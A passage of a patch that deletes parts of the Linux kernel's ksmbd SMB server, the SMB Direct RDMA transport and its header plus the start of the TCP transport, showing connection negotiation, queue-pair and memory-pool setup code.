+-		resp->max_readwrite_size = cpu_to_le32(t->max_rdma_rw_size);
+-		resp->preferred_send_size = cpu_to_le32(t->max_send_size);
+-		resp->max_receive_size = cpu_to_le32(t->max_recv_size);
+-		resp->max_fragmented_size =
+-				cpu_to_le32(t->max_fragmented_recv_size);
+-	}
+-
+-	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
+-						 (void *)resp, sizeof(*resp),
+-						 DMA_TO_DEVICE);
+-	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
+-	if (ret) {
+-		smb_direct_free_sendmsg(t, sendmsg);
+-		return ret;
+-	}
+-
+-	sendmsg->num_sge = 1;
+-	sendmsg->sge[0].length = sizeof(*resp);
+-	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
+-
+-	ret = post_sendmsg(t, NULL, sendmsg);
+-	if (ret) {
+-		smb_direct_free_sendmsg(t, sendmsg);
+-		return ret;
+-	}
+-
+-	wait_event(t->wait_send_pending,
+-		   atomic_read(&t->send_pending) == 0);
+-	return 0;
+-}
+-
+-static int smb_direct_accept_client(struct smb_direct_transport *t)
+-{
+-	struct rdma_conn_param conn_param;
+-	struct ib_port_immutable port_immutable;
+-	u32 ird_ord_hdr[2];
+-	int ret;
+-
+-	memset(&conn_param, 0, sizeof(conn_param));
+-	conn_param.initiator_depth = min_t(u8, t->cm_id->device->attrs.max_qp_rd_atom,
+-					   SMB_DIRECT_CM_INITIATOR_DEPTH);
+-	conn_param.responder_resources = 0;
+-
+-	t->cm_id->device->ops.get_port_immutable(t->cm_id->device,
+-						 t->cm_id->port_num,
+-						 &port_immutable);
+-	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
+-		ird_ord_hdr[0] = conn_param.responder_resources;
+-		ird_ord_hdr[1] = 1;
+-		conn_param.private_data = ird_ord_hdr;
+-		conn_param.private_data_len = sizeof(ird_ord_hdr);
+-	} else {
+-		conn_param.private_data = NULL;
+-		conn_param.private_data_len = 0;
+-	}
+-	conn_param.retry_count = SMB_DIRECT_CM_RETRY;
+-	conn_param.rnr_retry_count = SMB_DIRECT_CM_RNR_RETRY;
+-	conn_param.flow_control = 0;
+-
+-	ret = rdma_accept(t->cm_id, &conn_param);
+-	if (ret) {
+-		pr_err("error at rdma_accept: %d\n", ret);
+-		return ret;
+-	}
+-	return 0;
+-}
+-
+-static int smb_direct_prepare_negotiation(struct smb_direct_transport *t)
+-{
+-	int ret;
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	recvmsg = get_free_recvmsg(t);
+-	if (!recvmsg)
+-		return -ENOMEM;
+-	recvmsg->type = SMB_DIRECT_MSG_NEGOTIATE_REQ;
+-
+-	ret = smb_direct_post_recv(t, recvmsg);
+-	if (ret) {
+-		pr_err("Can't post recv: %d\n", ret);
+-		goto out_err;
+-	}
+-
+-	t->negotiation_requested = false;
+-	ret = smb_direct_accept_client(t);
+-	if (ret) {
+-		pr_err("Can't accept client\n");
+-		goto out_err;
+-	}
+-
+-	smb_direct_post_recv_credits(&t->post_recv_credits_work.work);
+-	return 0;
+-out_err:
+-	put_recvmsg(t, recvmsg);
+-	return ret;
+-}
+-
+-static unsigned int smb_direct_get_max_fr_pages(struct smb_direct_transport *t)
+-{
+-	return min_t(unsigned int,
+-		     t->cm_id->device->attrs.max_fast_reg_page_list_len,
+-		     256);
+-}
+-
+-static int smb_direct_init_params(struct smb_direct_transport *t,
+-				  struct ib_qp_cap *cap)
+-{
+-	struct ib_device *device = t->cm_id->device;
+-	int max_send_sges, max_rw_wrs, max_send_wrs;
+-	unsigned int max_sge_per_wr, wrs_per_credit;
+-
+-	/* need 3 more sge. because a SMB_DIRECT header, SMB2 header,
+-	 * SMB2 response could be mapped.
+-	 */
+-	t->max_send_size = smb_direct_max_send_size;
+-	max_send_sges = DIV_ROUND_UP(t->max_send_size, PAGE_SIZE) + 3;
+-	if (max_send_sges > SMB_DIRECT_MAX_SEND_SGES) {
+-		pr_err("max_send_size %d is too large\n", t->max_send_size);
+-		return -EINVAL;
+-	}
+-
+-	/* Calculate the number of work requests for RDMA R/W.
+-	 * The maximum number of pages which can be registered
+-	 * with one Memory region can be transferred with one
+-	 * R/W credit. And at least 4 work requests for each credit
+-	 * are needed for MR registration, RDMA R/W, local & remote
+-	 * MR invalidation.
+-	 */
+-	t->max_rdma_rw_size = smb_direct_max_read_write_size;
+-	t->pages_per_rw_credit = smb_direct_get_max_fr_pages(t);
+-	t->max_rw_credits = DIV_ROUND_UP(t->max_rdma_rw_size,
+-					 (t->pages_per_rw_credit - 1) *
+-					 PAGE_SIZE);
+-
+-	max_sge_per_wr = min_t(unsigned int, device->attrs.max_send_sge,
+-			       device->attrs.max_sge_rd);
+-	max_sge_per_wr = max_t(unsigned int, max_sge_per_wr,
+-			       max_send_sges);
+-	wrs_per_credit = max_t(unsigned int, 4,
+-			       DIV_ROUND_UP(t->pages_per_rw_credit,
+-					    max_sge_per_wr) + 1);
+-	max_rw_wrs = t->max_rw_credits * wrs_per_credit;
+-
+-	max_send_wrs = smb_direct_send_credit_target + max_rw_wrs;
+-	if (max_send_wrs > device->attrs.max_cqe ||
+-	    max_send_wrs > device->attrs.max_qp_wr) {
+-		pr_err("consider lowering send_credit_target = %d\n",
+-		       smb_direct_send_credit_target);
+-		pr_err("Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-		       device->attrs.max_cqe, device->attrs.max_qp_wr);
+-		return -EINVAL;
+-	}
+-
+-	if (smb_direct_receive_credit_max > device->attrs.max_cqe ||
+-	    smb_direct_receive_credit_max > device->attrs.max_qp_wr) {
+-		pr_err("consider lowering receive_credit_max = %d\n",
+-		       smb_direct_receive_credit_max);
+-		pr_err("Possible CQE overrun, device reporting max_cpe %d max_qp_wr %d\n",
+-		       device->attrs.max_cqe, device->attrs.max_qp_wr);
+-		return -EINVAL;
+-	}
+-
+-	if (device->attrs.max_recv_sge < SMB_DIRECT_MAX_RECV_SGES) {
+-		pr_err("warning: device max_recv_sge = %d too small\n",
+-		       device->attrs.max_recv_sge);
+-		return -EINVAL;
+-	}
+-
+-	t->recv_credits = 0;
+-	t->count_avail_recvmsg = 0;
+-
+-	t->recv_credit_max = smb_direct_receive_credit_max;
+-	t->recv_credit_target = 10;
+-	t->new_recv_credits = 0;
+-
+-	t->send_credit_target = smb_direct_send_credit_target;
+-	atomic_set(&t->send_credits, 0);
+-	atomic_set(&t->rw_credits, t->max_rw_credits);
+-
+-	t->max_send_size = smb_direct_max_send_size;
+-	t->max_recv_size = smb_direct_max_receive_size;
+-	t->max_fragmented_recv_size = smb_direct_max_fragmented_recv_size;
+-
+-	cap->max_send_wr = max_send_wrs;
+-	cap->max_recv_wr = t->recv_credit_max;
+-	cap->max_send_sge = max_sge_per_wr;
+-	cap->max_recv_sge = SMB_DIRECT_MAX_RECV_SGES;
+-	cap->max_inline_data = 0;
+-	cap->max_rdma_ctxs = t->max_rw_credits;
+-	return 0;
+-}
+-
+-static void smb_direct_destroy_pools(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	while ((recvmsg = get_free_recvmsg(t)))
+-		mempool_free(recvmsg, t->recvmsg_mempool);
+-	while ((recvmsg = get_empty_recvmsg(t)))
+-		mempool_free(recvmsg, t->recvmsg_mempool);
+-
+-	mempool_destroy(t->recvmsg_mempool);
+-	t->recvmsg_mempool = NULL;
+-
+-	kmem_cache_destroy(t->recvmsg_cache);
+-	t->recvmsg_cache = NULL;
+-
+-	mempool_destroy(t->sendmsg_mempool);
+-	t->sendmsg_mempool = NULL;
+-
+-	kmem_cache_destroy(t->sendmsg_cache);
+-	t->sendmsg_cache = NULL;
+-}
+-
+-static int smb_direct_create_pools(struct smb_direct_transport *t)
+-{
+-	char name[80];
+-	int i;
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	snprintf(name, sizeof(name), "smb_direct_rqst_pool_%p", t);
+-	t->sendmsg_cache = kmem_cache_create(name,
+-					     sizeof(struct smb_direct_sendmsg) +
+-					      sizeof(struct smb_direct_negotiate_resp),
+-					     0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!t->sendmsg_cache)
+-		return -ENOMEM;
+-
+-	t->sendmsg_mempool = mempool_create(t->send_credit_target,
+-					    mempool_alloc_slab, mempool_free_slab,
+-					    t->sendmsg_cache);
+-	if (!t->sendmsg_mempool)
+-		goto err;
+-
+-	snprintf(name, sizeof(name), "smb_direct_resp_%p", t);
+-	t->recvmsg_cache = kmem_cache_create(name,
+-					     sizeof(struct smb_direct_recvmsg) +
+-					      t->max_recv_size,
+-					     0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!t->recvmsg_cache)
+-		goto err;
+-
+-	t->recvmsg_mempool =
+-		mempool_create(t->recv_credit_max, mempool_alloc_slab,
+-			       mempool_free_slab, t->recvmsg_cache);
+-	if (!t->recvmsg_mempool)
+-		goto err;
+-
+-	INIT_LIST_HEAD(&t->recvmsg_queue);
+-
+-	for (i = 0; i < t->recv_credit_max; i++) {
+-		recvmsg = mempool_alloc(t->recvmsg_mempool, GFP_KERNEL);
+-		if (!recvmsg)
+-			goto err;
+-		recvmsg->transport = t;
+-		list_add(&recvmsg->list, &t->recvmsg_queue);
+-	}
+-	t->count_avail_recvmsg = t->recv_credit_max;
+-
+-	return 0;
+-err:
+-	smb_direct_destroy_pools(t);
+-	return -ENOMEM;
+-}
+-
+-static int smb_direct_create_qpair(struct smb_direct_transport *t,
+-				   struct ib_qp_cap *cap)
+-{
+-	int ret;
+-	struct ib_qp_init_attr qp_attr;
+-	int pages_per_rw;
+-
+-	t->pd = ib_alloc_pd(t->cm_id->device, 0);
+-	if (IS_ERR(t->pd)) {
+-		pr_err("Can't create RDMA PD\n");
+-		ret = PTR_ERR(t->pd);
+-		t->pd = NULL;
+-		return ret;
+-	}
+-
+-	t->send_cq = ib_alloc_cq(t->cm_id->device, t,
+-				 smb_direct_send_credit_target + cap->max_rdma_ctxs,
+-				 0, IB_POLL_WORKQUEUE);
+-	if (IS_ERR(t->send_cq)) {
+-		pr_err("Can't create RDMA send CQ\n");
+-		ret = PTR_ERR(t->send_cq);
+-		t->send_cq = NULL;
+-		goto err;
+-	}
+-
+-	t->recv_cq = ib_alloc_cq(t->cm_id->device, t,
+-				 t->recv_credit_max, 0, IB_POLL_WORKQUEUE);
+-	if (IS_ERR(t->recv_cq)) {
+-		pr_err("Can't create RDMA recv CQ\n");
+-		ret = PTR_ERR(t->recv_cq);
+-		t->recv_cq = NULL;
+-		goto err;
+-	}
+-
+-	memset(&qp_attr, 0, sizeof(qp_attr));
+-	qp_attr.event_handler = smb_direct_qpair_handler;
+-	qp_attr.qp_context = t;
+-	qp_attr.cap = *cap;
+-	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
+-	qp_attr.qp_type = IB_QPT_RC;
+-	qp_attr.send_cq = t->send_cq;
+-	qp_attr.recv_cq = t->recv_cq;
+-	qp_attr.port_num = ~0;
+-
+-	ret = rdma_create_qp(t->cm_id, t->pd, &qp_attr);
+-	if (ret) {
+-		pr_err("Can't create RDMA QP: %d\n", ret);
+-		goto err;
+-	}
+-
+-	t->qp = t->cm_id->qp;
+-	t->cm_id->event_handler = smb_direct_cm_handler;
+-
+-	pages_per_rw = DIV_ROUND_UP(t->max_rdma_rw_size, PAGE_SIZE) + 1;
+-	if (pages_per_rw > t->cm_id->device->attrs.max_sgl_rd) {
+-		ret = ib_mr_pool_init(t->qp, &t->qp->rdma_mrs,
+-				      t->max_rw_credits, IB_MR_TYPE_MEM_REG,
+-				      t->pages_per_rw_credit, 0);
+-		if (ret) {
+-			pr_err("failed to init mr pool count %d pages %d\n",
+-			       t->max_rw_credits, t->pages_per_rw_credit);
+-			goto err;
+-		}
+-	}
+-
+-	return 0;
+-err:
+-	if (t->qp) {
+-		ib_destroy_qp(t->qp);
+-		t->qp = NULL;
+-	}
+-	if (t->recv_cq) {
+-		ib_destroy_cq(t->recv_cq);
+-		t->recv_cq = NULL;
+-	}
+-	if (t->send_cq) {
+-		ib_destroy_cq(t->send_cq);
+-		t->send_cq = NULL;
+-	}
+-	if (t->pd) {
+-		ib_dealloc_pd(t->pd);
+-		t->pd = NULL;
+-	}
+-	return ret;
+-}
+-
+-static int smb_direct_prepare(struct ksmbd_transport *t)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-	struct smb_direct_recvmsg *recvmsg;
+-	struct smb_direct_negotiate_req *req;
+-	int ret;
+-
+-	ksmbd_debug(RDMA, "Waiting for SMB_DIRECT negotiate request\n");
+-	ret = wait_event_interruptible_timeout(st->wait_status,
+-					       st->negotiation_requested ||
+-					       st->status == SMB_DIRECT_CS_DISCONNECTED,
+-					       SMB_DIRECT_NEGOTIATE_TIMEOUT * HZ);
+-	if (ret <= 0 || st->status == SMB_DIRECT_CS_DISCONNECTED)
+-		return ret < 0 ? ret : -ETIMEDOUT;
+-
+-	recvmsg = get_first_reassembly(st);
+-	if (!recvmsg)
+-		return -ECONNABORTED;
+-
+-	ret = smb_direct_check_recvmsg(recvmsg);
+-	if (ret == -ECONNABORTED)
+-		goto out;
+-
+-	req = (struct smb_direct_negotiate_req *)recvmsg->packet;
+-	st->max_recv_size = min_t(int, st->max_recv_size,
+-				  le32_to_cpu(req->preferred_send_size));
+-	st->max_send_size = min_t(int, st->max_send_size,
+-				  le32_to_cpu(req->max_receive_size));
+-	st->max_fragmented_send_size =
+-		le32_to_cpu(req->max_fragmented_size);
+-	st->max_fragmented_recv_size =
+-		(st->recv_credit_max * st->max_recv_size) / 2;
+-
+-	ret = smb_direct_send_negotiate_response(st, ret);
+-out:
+-	spin_lock_irq(&st->reassembly_queue_lock);
+-	st->reassembly_queue_length--;
+-	list_del(&recvmsg->list);
+-	spin_unlock_irq(&st->reassembly_queue_lock);
+-	put_recvmsg(st, recvmsg);
+-
+-	return ret;
+-}
+-
+-static int smb_direct_connect(struct smb_direct_transport *st)
+-{
+-	int ret;
+-	struct ib_qp_cap qp_cap;
+-
+-	ret = smb_direct_init_params(st, &qp_cap);
+-	if (ret) {
+-		pr_err("Can't configure RDMA parameters\n");
+-		return ret;
+-	}
+-
+-	ret = smb_direct_create_pools(st);
+-	if (ret) {
+-		pr_err("Can't init RDMA pool: %d\n", ret);
+-		return ret;
+-	}
+-
+-	ret = smb_direct_create_qpair(st, &qp_cap);
+-	if (ret) {
+-		pr_err("Can't accept RDMA client: %d\n", ret);
+-		return ret;
+-	}
+-
+-	ret = smb_direct_prepare_negotiation(st);
+-	if (ret) {
+-		pr_err("Can't negotiate: %d\n", ret);
+-		return ret;
+-	}
+-	return 0;
+-}
+-
+-static bool rdma_frwr_is_supported(struct ib_device_attr *attrs)
+-{
+-	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
+-		return false;
+-	if (attrs->max_fast_reg_page_list_len == 0)
+-		return false;
+-	return true;
+-}
+-
+-static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
+-{
+-	struct smb_direct_transport *t;
+-	int ret;
+-
+-	if (!rdma_frwr_is_supported(&new_cm_id->device->attrs)) {
+-		ksmbd_debug(RDMA,
+-			    "Fast Registration Work Requests is not supported. device capabilities=%llx\n",
+-			    new_cm_id->device->attrs.device_cap_flags);
+-		return -EPROTONOSUPPORT;
+-	}
+-
+-	t = alloc_transport(new_cm_id);
+-	if (!t)
+-		return -ENOMEM;
+-
+-	ret = smb_direct_connect(t);
+-	if (ret)
+-		goto out_err;
+-
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
+-					      smb_direct_port);
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
+-		ret = PTR_ERR(KSMBD_TRANS(t)->handler);
+-		pr_err("Can't start thread\n");
+-		goto out_err;
+-	}
+-
+-	return 0;
+-out_err:
+-	free_transport(t);
+-	return ret;
+-}
+-
+-static int smb_direct_listen_handler(struct rdma_cm_id *cm_id,
+-				     struct rdma_cm_event *event)
+-{
+-	switch (event->event) {
+-	case RDMA_CM_EVENT_CONNECT_REQUEST: {
+-		int ret = smb_direct_handle_connect_request(cm_id);
+-
+-		if (ret) {
+-			pr_err("Can't create transport: %d\n", ret);
+-			return ret;
+-		}
+-
+-		ksmbd_debug(RDMA, "Received connection request. cm_id=%p\n",
+-			    cm_id);
+-		break;
+-	}
+-	default:
+-		pr_err("Unexpected listen event. cm_id=%p, event=%s (%d)\n",
+-		       cm_id, rdma_event_msg(event->event), event->event);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static int smb_direct_listen(int port)
+-{
+-	int ret;
+-	struct rdma_cm_id *cm_id;
+-	struct sockaddr_in sin = {
+-		.sin_family		= AF_INET,
+-		.sin_addr.s_addr	= htonl(INADDR_ANY),
+-		.sin_port		= htons(port),
+-	};
+-
+-	cm_id = rdma_create_id(&init_net, smb_direct_listen_handler,
+-			       &smb_direct_listener, RDMA_PS_TCP, IB_QPT_RC);
+-	if (IS_ERR(cm_id)) {
+-		pr_err("Can't create cm id: %ld\n", PTR_ERR(cm_id));
+-		return PTR_ERR(cm_id);
+-	}
+-
+-	ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
+-	if (ret) {
+-		pr_err("Can't bind: %d\n", ret);
+-		goto err;
+-	}
+-
+-	smb_direct_listener.cm_id = cm_id;
+-
+-	ret = rdma_listen(cm_id, 10);
+-	if (ret) {
+-		pr_err("Can't listen: %d\n", ret);
+-		goto err;
+-	}
+-	return 0;
+-err:
+-	smb_direct_listener.cm_id = NULL;
+-	rdma_destroy_id(cm_id);
+-	return ret;
+-}
+-
+-static int smb_direct_ib_client_add(struct ib_device *ib_dev)
+-{
+-	struct smb_direct_device *smb_dev;
+-
+-	/* Set 5445 port if device type is iWARP(No IB) */
+-	if (ib_dev->node_type != RDMA_NODE_IB_CA)
+-		smb_direct_port = SMB_DIRECT_PORT_IWARP;
+-
+-	if (!ib_dev->ops.get_netdev ||
+-	    !rdma_frwr_is_supported(&ib_dev->attrs))
+-		return 0;
+-
+-	smb_dev = kzalloc(sizeof(*smb_dev), GFP_KERNEL);
+-	if (!smb_dev)
+-		return -ENOMEM;
+-	smb_dev->ib_dev = ib_dev;
+-
+-	write_lock(&smb_direct_device_lock);
+-	list_add(&smb_dev->list, &smb_direct_device_list);
+-	write_unlock(&smb_direct_device_lock);
+-
+-	ksmbd_debug(RDMA, "ib device added: name %s\n", ib_dev->name);
+-	return 0;
+-}
+-
+-static void smb_direct_ib_client_remove(struct ib_device *ib_dev,
+-					void *client_data)
+-{
+-	struct smb_direct_device *smb_dev, *tmp;
+-
+-	write_lock(&smb_direct_device_lock);
+-	list_for_each_entry_safe(smb_dev, tmp, &smb_direct_device_list, list) {
+-		if (smb_dev->ib_dev == ib_dev) {
+-			list_del(&smb_dev->list);
+-			kfree(smb_dev);
+-			break;
+-		}
+-	}
+-	write_unlock(&smb_direct_device_lock);
+-}
+-
+-static struct ib_client smb_direct_ib_client = {
+-	.name	= "ksmbd_smb_direct_ib",
+-	.add	= smb_direct_ib_client_add,
+-	.remove	= smb_direct_ib_client_remove,
+-};
+-
+-int ksmbd_rdma_init(void)
+-{
+-	int ret;
+-
+-	smb_direct_listener.cm_id = NULL;
+-
+-	ret = ib_register_client(&smb_direct_ib_client);
+-	if (ret) {
+-		pr_err("failed to ib_register_client\n");
+-		return ret;
+-	}
+-
+-	/* When a client is running out of send credits, the credits are
+-	 * granted by the server's sending a packet using this queue.
+-	 * This avoids the situation that a clients cannot send packets
+-	 * for lack of credits
+-	 */
+-	smb_direct_wq = alloc_workqueue("ksmbd-smb_direct-wq",
+-					WQ_HIGHPRI | WQ_MEM_RECLAIM, 0);
+-	if (!smb_direct_wq)
+-		return -ENOMEM;
+-
+-	ret = smb_direct_listen(smb_direct_port);
+-	if (ret) {
+-		destroy_workqueue(smb_direct_wq);
+-		smb_direct_wq = NULL;
+-		pr_err("Can't listen: %d\n", ret);
+-		return ret;
+-	}
+-
+-	ksmbd_debug(RDMA, "init RDMA listener. cm_id=%p\n",
+-		    smb_direct_listener.cm_id);
+-	return 0;
+-}
+-
+-void ksmbd_rdma_destroy(void)
+-{
+-	if (!smb_direct_listener.cm_id)
+-		return;
+-
+-	ib_unregister_client(&smb_direct_ib_client);
+-	rdma_destroy_id(smb_direct_listener.cm_id);
+-
+-	smb_direct_listener.cm_id = NULL;
+-
+-	if (smb_direct_wq) {
+-		destroy_workqueue(smb_direct_wq);
+-		smb_direct_wq = NULL;
+-	}
+-}
+-
+-bool ksmbd_rdma_capable_netdev(struct net_device *netdev)
+-{
+-	struct smb_direct_device *smb_dev;
+-	int i;
+-	bool rdma_capable = false;
+-
+-	read_lock(&smb_direct_device_lock);
+-	list_for_each_entry(smb_dev, &smb_direct_device_list, list) {
+-		for (i = 0; i < smb_dev->ib_dev->phys_port_cnt; i++) {
+-			struct net_device *ndev;
+-
+-			ndev = smb_dev->ib_dev->ops.get_netdev(smb_dev->ib_dev,
+-							       i + 1);
+-			if (!ndev)
+-				continue;
+-
+-			if (ndev == netdev) {
+-				dev_put(ndev);
+-				rdma_capable = true;
+-				goto out;
+-			}
+-			dev_put(ndev);
+-		}
+-	}
+-out:
+-	read_unlock(&smb_direct_device_lock);
+-
+-	if (rdma_capable == false) {
+-		struct ib_device *ibdev;
+-
+-		ibdev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_UNKNOWN);
+-		if (ibdev) {
+-			if (rdma_frwr_is_supported(&ibdev->attrs))
+-				rdma_capable = true;
+-			ib_device_put(ibdev);
+-		}
+-	}
+-
+-	return rdma_capable;
+-}
+-
+-static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops = {
+-	.prepare	= smb_direct_prepare,
+-	.disconnect	= smb_direct_disconnect,
+-	.shutdown	= smb_direct_shutdown,
+-	.writev		= smb_direct_writev,
+-	.read		= smb_direct_read,
+-	.rdma_read	= smb_direct_rdma_read,
+-	.rdma_write	= smb_direct_rdma_write,
+-};
+diff --git a/fs/ksmbd/transport_rdma.h b/fs/ksmbd/transport_rdma.h
+deleted file mode 100644
+index 77aee4e5c9dcd..0000000000000
+--- a/fs/ksmbd/transport_rdma.h
++++ /dev/null
+@@ -1,69 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *   Copyright (C) 2018, LG Electronics.
+- */
+-
+-#ifndef __KSMBD_TRANSPORT_RDMA_H__
+-#define __KSMBD_TRANSPORT_RDMA_H__
+-
+-#define SMBD_DEFAULT_IOSIZE (8 * 1024 * 1024)
+-#define SMBD_MIN_IOSIZE (512 * 1024)
+-#define SMBD_MAX_IOSIZE (16 * 1024 * 1024)
+-
+-/* SMB DIRECT negotiation request packet [MS-SMBD] 2.2.1 */
+-struct smb_direct_negotiate_req {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-/* SMB DIRECT negotiation response packet [MS-SMBD] 2.2.2 */
+-struct smb_direct_negotiate_resp {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 negotiated_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le32 status;
+-	__le32 max_readwrite_size;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
+-
+-/* SMB DIRECT data transfer packet with payload [MS-SMBD] 2.2.3 */
+-struct smb_direct_data_transfer {
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le16 flags;
+-	__le16 reserved;
+-	__le32 remaining_data_length;
+-	__le32 data_offset;
+-	__le32 data_length;
+-	__le32 padding;
+-	__u8 buffer[];
+-} __packed;
+-
+-#ifdef CONFIG_SMB_SERVER_SMBDIRECT
+-int ksmbd_rdma_init(void);
+-void ksmbd_rdma_destroy(void);
+-bool ksmbd_rdma_capable_netdev(struct net_device *netdev);
+-void init_smbd_max_io_size(unsigned int sz);
+-unsigned int get_smbd_max_read_write_size(void);
+-#else
+-static inline int ksmbd_rdma_init(void) { return 0; }
+-static inline int ksmbd_rdma_destroy(void) { return 0; }
+-static inline bool ksmbd_rdma_capable_netdev(struct net_device *netdev) { return false; }
+-static inline void init_smbd_max_io_size(unsigned int sz) { }
+-static inline unsigned int get_smbd_max_read_write_size(void) { return 0; }
+-#endif
+-
+-#endif /* __KSMBD_TRANSPORT_RDMA_H__ */
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+deleted file mode 100644
+index eff7a1d793f00..0000000000000
+--- a/fs/ksmbd/transport_tcp.c
++++ /dev/null
+@@ -1,649 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/freezer.h>
+-
+-#include "smb_common.h"
+-#include "server.h"
+-#include "auth.h"
+-#include "connection.h"
+-#include "transport_tcp.h"
+-
+-#define IFACE_STATE_DOWN		BIT(0)
+-#define IFACE_STATE_CONFIGURED		BIT(1)
+-
+-static atomic_t active_num_conn;
+-
+-struct interface {
+-	struct task_struct	*ksmbd_kthread;
+-	struct socket		*ksmbd_socket;
+-	struct list_head	entry;
+-	char			*name;
+-	struct mutex		sock_release_lock;
+-	int			state;
+-};
+-
+-static LIST_HEAD(iface_list);
+-
+-static int bind_additional_ifaces;
+-
+-struct tcp_transport {
+-	struct ksmbd_transport		transport;
+-	struct socket			*sock;
+-	struct kvec			*iov;
+-	unsigned int			nr_iov;
+-};
+-
+-static struct ksmbd_transport_ops ksmbd_tcp_transport_ops;
+-
+-static void tcp_stop_kthread(struct task_struct *kthread);
+-static struct interface *alloc_iface(char *ifname);
+-
+-#define KSMBD_TRANS(t)	(&(t)->transport)
+-#define TCP_TRANS(t)	((struct tcp_transport *)container_of(t, \
+-				struct tcp_transport, transport))
+-
+-static inline void ksmbd_tcp_nodelay(struct socket *sock)
+-{
+-	tcp_sock_set_nodelay(sock->sk);
+-}
+-
+-static inline void ksmbd_tcp_reuseaddr(struct socket *sock)
+-{
+-	sock_set_reuseaddr(sock->sk);
+-}
+-
+-static inline void ksmbd_tcp_rcv_timeout(struct socket *sock, s64 secs)
+-{
+-	lock_sock(sock->sk);
+-	if (secs && secs < MAX_SCHEDULE_TIMEOUT / HZ - 1)
+-		sock->sk->sk_rcvtimeo = secs * HZ;
+-	else
+-		sock->sk->sk_rcvtimeo = MAX_SCHEDULE_TIMEOUT;
+-	release_sock(sock->sk);
+-}
+-
+-static inline void ksmbd_tcp_snd_timeout(struct socket *sock, s64 secs)
+-{
+-	sock_set_sndtimeo(sock->sk, secs);
+-}
+-
+-static struct tcp_transport *alloc_transport(struct socket *client_sk)
+-{
+-	struct tcp_transport *t;
+-	struct ksmbd_conn *conn;
+-
+-	t = kzalloc(sizeof(*t), GFP_KERNEL);
+-	if (!t)
+-		return NULL;
+-	t->sock = client_sk;
+-
+-	conn = ksmbd_conn_alloc();
+-	if (!conn) {
+-		kfree(t);
+-		return NULL;
+-	}
+-
+-	conn->transport = KSMBD_TRANS(t);
+-	KSMBD_TRANS(t)->conn = conn;
+-	KSMBD_TRANS(t)->ops = &ksmbd_tcp_transport_ops;
+-	return t;
+-}
+-
+-static void free_transport(struct tcp_transport *t)
+-{
+-	kernel_sock_shutdown(t->sock, SHUT_RDWR);
+-	sock_release(t->sock);
+-	t->sock = NULL;
+-
+-	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
+-	kfree(t->iov);
+-	kfree(t);
+-}
+-
+-/**
+- * kvec_array_init() - initialize a IO vector segment
+- * @new:	IO vector to be initialized
+- * @iov:	base IO vector
+- * @nr_segs:	number of segments in base iov
+- * @bytes:	total iovec length so far for read
+- *
+- * Return:	Number of IO segments
+- */
+-static unsigned int kvec_array_init(struct kvec *new, struct kvec *iov,
+-				    unsigned int nr_segs, size_t bytes)
+-{
+-	size_t base = 0;
+-
+-	while (bytes || !iov->iov_len) {
+-		int copy = min(bytes, iov->iov_len);
+-
+-		bytes -= copy;
+-		base += copy;
+-		if (iov->iov_len == base) {
+-			iov++;
+-			nr_segs--;
+-			base = 0;
+-		}
+-	}
+-
+-	memcpy(new, iov, sizeof(*iov) * nr_segs);
+-	new->iov_base += base;
+-	new->iov_len -= base;
+-	return nr_segs;
+-}
+-
+-/**
+- * get_conn_iovec() - get connection iovec for reading from socket
+- * @t:		TCP transport instance
+- * @nr_segs:	number of segments in iov
+- *
+- * Return:	return existing or newly allocate iovec
+- */
+-static struct kvec *get_conn_iovec(struct tcp_transport *t, unsigned int nr_segs)
+-{
+-	struct kvec *new_iov;
+-
+-	if (t->iov && nr_segs <= t->nr_iov)
+-		return t->iov;
+-
+-	/* not big enough -- allocate a new one and release the old */
+-	new_iov = kmalloc_array(nr_segs, sizeof(*new_iov), GFP_KERNEL);
+-	if (new_iov) {
+-		kfree(t->iov);
+-		t->iov = new_iov;
+-		t->nr_iov = nr_segs;
+-	}
+-	return new_iov;
+-}
+-
+-static unsigned short ksmbd_tcp_get_port(const struct sockaddr *sa)
+-{
+-	switch (sa->sa_family) {
+-	case AF_INET:
+-		return ntohs(((struct sockaddr_in *)sa)->sin_port);
+-	case AF_INET6:
+-		return ntohs(((struct sockaddr_in6 *)sa)->sin6_port);
+-	}
+-	return 0;
+-}
+-
+-/**
